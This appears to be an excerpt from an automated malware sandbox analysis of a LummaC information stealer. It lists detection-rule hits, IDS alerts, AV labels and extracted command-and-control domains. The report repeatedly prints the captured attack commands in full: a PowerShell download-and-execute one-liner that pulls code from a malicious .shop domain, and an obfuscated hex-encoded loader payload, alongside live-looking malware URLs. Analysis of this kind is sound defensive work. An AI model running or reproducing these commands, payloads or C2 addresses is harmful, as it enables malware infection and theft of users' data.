rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF2
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF2

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-29T09:25:06.266211+010020283713Unknown Traffic192.168.2.549931104.21.80.1443TCP
                2024-12-29T09:25:08.457698+010020283713Unknown Traffic192.168.2.549936104.21.80.1443TCP
                2024-12-29T09:25:11.939596+010020283713Unknown Traffic192.168.2.549945104.21.80.1443TCP
                2024-12-29T09:25:14.357822+010020283713Unknown Traffic192.168.2.549951104.21.80.1443TCP
                2024-12-29T09:25:16.688617+010020283713Unknown Traffic192.168.2.549957104.21.80.1443TCP
                2024-12-29T09:25:19.173275+010020283713Unknown Traffic192.168.2.549965104.21.80.1443TCP
                2024-12-29T09:25:21.274571+010020283713Unknown Traffic192.168.2.549969104.21.80.1443TCP
                2024-12-29T09:25:23.555991+010020283713Unknown Traffic192.168.2.549975104.21.80.1443TCP
                2024-12-29T09:25:26.273390+010020283713Unknown Traffic192.168.2.549982185.161.251.21443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-29T09:25:07.120037+010020546531A Network Trojan was detected192.168.2.549931104.21.80.1443TCP
                2024-12-29T09:25:10.370651+010020546531A Network Trojan was detected192.168.2.549936104.21.80.1443TCP
                2024-12-29T09:25:24.358688+010020546531A Network Trojan was detected192.168.2.549975104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-29T09:25:07.120037+010020498361A Network Trojan was detected192.168.2.549931104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-29T09:25:10.370651+010020498121A Network Trojan was detected192.168.2.549936104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-29T09:25:22.289146+010020480941Malware Command and Control Activity Detected192.168.2.549969104.21.80.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://cegu.shop/Avira URL Cloud: Label: malware
                Source: https://klipvumisui.shop/int_clp_sha.txts=RcAvira URL Cloud: Label: malware
                Source: https://klipvumisui.shop/int_clp_sha.txtZRAvira URL Cloud: Label: malware
                Source: https://cegu.shop/8574262446/ph.txtAvira URL Cloud: Label: malware
                Source: https://klipvumisui.shop/int_clp_sha.txtAvira URL Cloud: Label: malware
                Source: 8.2.powershell.exe.4f0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "crackerdolk.click", "hummskitnj.buzz", "appliacnesot.buzz", "cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "prisonyfork.buzz", "screwamusresz.buzz"], "Build id": "jMw1IE--bigJ"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: hummskitnj.buzz
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: cashfuzysao.buzz
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: appliacnesot.buzz
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: screwamusresz.buzz
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: inherineau.buzz
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: scentniej.buzz
